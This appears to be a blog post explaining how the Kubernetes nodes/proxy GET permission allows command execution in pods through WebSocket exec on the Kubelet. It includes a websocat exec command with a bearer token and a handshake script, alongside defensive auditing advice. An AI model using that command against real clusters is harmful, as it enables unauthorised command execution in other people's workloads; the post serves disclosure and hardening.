Understanding the Kubernetes nodes/proxy GET RCE “Vulnerability” (And Why It’s Working as Intended)
When you think of a "security bug," you usually imagine something getting fixed — patches, CVEs, frantic updates… But what if the behavior you're calling a bug is actually working exactly the way the project maintainers intended?
That's the situation with an interesting Kubernetes authorization behavior involving the nodes/proxy GET permission. What looks like a Remote Code Execution (RCE) vector is actually a side-effect of how Kubernetes implements authorization for certain API paths — particularly the Kubelet's exec interfaces over WebSockets.
Let's unpack what's happening, why it matters, and most importantly: how it works.
What Does nodes/proxy GET Actually Allow?
Kubernetes Role-Based Access Control (RBAC) permissions are defined with resources and verbs. For example:
- pods/exec CREATE - permits creating an exec session in a pod
- pods/log GET - permits reading logs
But the nodes/proxy resource is a bit different: it's used to proxy requests from the API server to the Kubelet itself. Many monitoring tools require nodes/proxy GET just to fetch metrics or logs on a node.
Here's an example of such a ClusterRole:
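A monitoring-style ClusterRole along these lines might look like the following (the role name here is illustrative):

```yaml
# Hypothetical monitoring role -- the name is a placeholder,
# but the rule is the typical shape such charts request.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: metrics-reader
rules:
- apiGroups: [""]
  resources: ["nodes/proxy"]
  verbs: ["get"]
```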
Sounds innocent enough: read-only, right?
Where Things Get Weird: exec Over WebSockets
To understand the gotcha, it helps to know how interactive exec works:
- The Kubelet supports exec via a WebSocket connection
- WebSockets start with an HTTP GET request that upgrades the connection
- Kubernetes RBAC makes its authorization decision based on the initial HTTP verb and path
That's the crux of the issue. When a client tries to create an exec session over WebSockets, the initial connection is a GET, even though the ultimate intention is to run commands (something that logically feels like a write).
Because of this, Kubernetes treats the request like a GET and checks if the user has nodes/proxy GET, even though what they're trying to do — execute commands — should logically require create/exec permissions.
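You can see this concretely by constructing a WebSocket opening handshake by hand. This is a minimal sketch of the RFC 6455 handshake (the host, path, and pod names are placeholders): the very first bytes a client sends are an ordinary HTTP GET, and that is all the authorizer sees.

```python
import base64
import os

# Minimal sketch of a WebSocket opening handshake (RFC 6455).
# The client's first bytes on the wire are a plain HTTP GET request;
# the "upgrade" to a streaming connection only happens afterward.
def websocket_handshake(host: str, path: str) -> bytes:
    # Sec-WebSocket-Key is 16 random bytes, base64-encoded
    key = base64.b64encode(os.urandom(16)).decode()
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Upgrade: websocket\r\n"
        "Connection: Upgrade\r\n"
        f"Sec-WebSocket-Key: {key}\r\n"
        "Sec-WebSocket-Version: 13\r\n"
        "\r\n"
    ).encode()

handshake = websocket_handshake(
    "kubelet.example:10250",
    "/exec/default/mypod/shell?command=id&output=1",
)
print(handshake.split(b"\r\n")[0])
# b'GET /exec/default/mypod/shell?command=id&output=1 HTTP/1.1'
```

The request line literally says `GET`, so a verb-based authorizer has no way to tell this apart from a harmless read.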
The Result: Exec Without CREATE
With only the nodes/proxy GET permission and network access to the node's Kubelet (typically port 10250), an attacker or a compromised service account can effectively run arbitrary commands in any Pod on that node.
Here's an example invocation using websocat:
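Something along these lines, where the API server address, node, pod, container, token, and even the subprotocol string are placeholders you'd adapt to your cluster (this is a sketch, not a tested exploit):

```shell
# Sketch only: server, node, pod, container, and token are placeholders.
TOKEN="<service-account-token>"
websocat -k \
  -H "Authorization: Bearer ${TOKEN}" \
  --protocol "v4.channel.k8s.io" \
  "wss://<api-server>:6443/api/v1/nodes/<node>/proxy/exec/default/<pod>/<container>?command=id&output=1&error=1"
```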
The result?
Boom — you're executing commands inside a container without having pods/exec CREATE! That's powerful (and scary).
So Is This a "Bug"?
This behavior was reported through the Kubernetes security disclosure process, but the team ultimately closed it as design-by-intent — meaning Kubernetes is working exactly the way it was designed.
The RBAC model in Kubernetes:
- Maps HTTP verbs (GET, POST, etc.) to RBAC verbs (get, create, etc.)
- Makes decisions based on the initial HTTP request — even if the underlying action (exec) is more than a simple GET
Because WebSockets start with a GET, the authorization check uses the GET verb, and therefore anything allowed by that permission may also open the door to actions that should require more powerful verbs.
Why It Happens
Two main implementation details collide here:
🔹 WebSocket Handshake Uses GET
Interactive features like exec and attach use WebSockets for bi-directional streaming. But WebSockets must begin with an HTTP GET handshake, which is then "upgraded" to a persistent connection. Kubernetes RBAC doesn't re-check authorization after the upgrade.
🔹 nodes/proxy Covers "Proxy" Paths
Any sub-path under a node's proxy endpoint (including /exec) is classified as the nodes/proxy subresource, so if you hold nodes/proxy GET, the authorization check passes for all of them.
Real-World Impact
This isn't just a theoretical edge case:
- Many common Helm charts request nodes/proxy GET so tools can fetch metrics and logs
- A compromised service account — or one with overly-broad access — could abuse this to gain exec access to pods they shouldn't control
- Requests through this path show up as generic nodes/proxy GETs rather than as exec operations, making abuse harder to spot in audit logs
Yet the Kubernetes team didn't change how this works: a fix would require deeper protocol awareness, such as re-authorizing requests after the WebSocket upgrade or distinguishing individual proxied sub-paths, which is difficult to do without breaking existing functionality.
What Can You Do About It?
Because this behavior is currently intentional:
Audit Permissions Carefully
Don't grant nodes/proxy GET unless absolutely necessary.
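To find out who already holds this permission, you can scan your cluster's roles. A sketch assuming kubectl and jq are available (untested against any particular cluster):

```shell
# List ClusterRoles that grant "get" (or "*") on nodes/proxy.
kubectl get clusterroles -o json | jq -r '
  .items[]
  | select(any(.rules[]?;
      ((.resources // []) | index("nodes/proxy"))
      and ((.verbs // []) | (index("get") or index("*")))))
  | .metadata.name'
```

Any name this prints is worth cross-referencing against its ClusterRoleBindings to see which subjects actually hold the permission.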
Use Least Privilege
Ensure service accounts are scoped tightly — especially those related to monitoring or metrics gathering.
Monitor Kubelet Access
Restrict access to the Kubelet API on port 10250 wherever possible.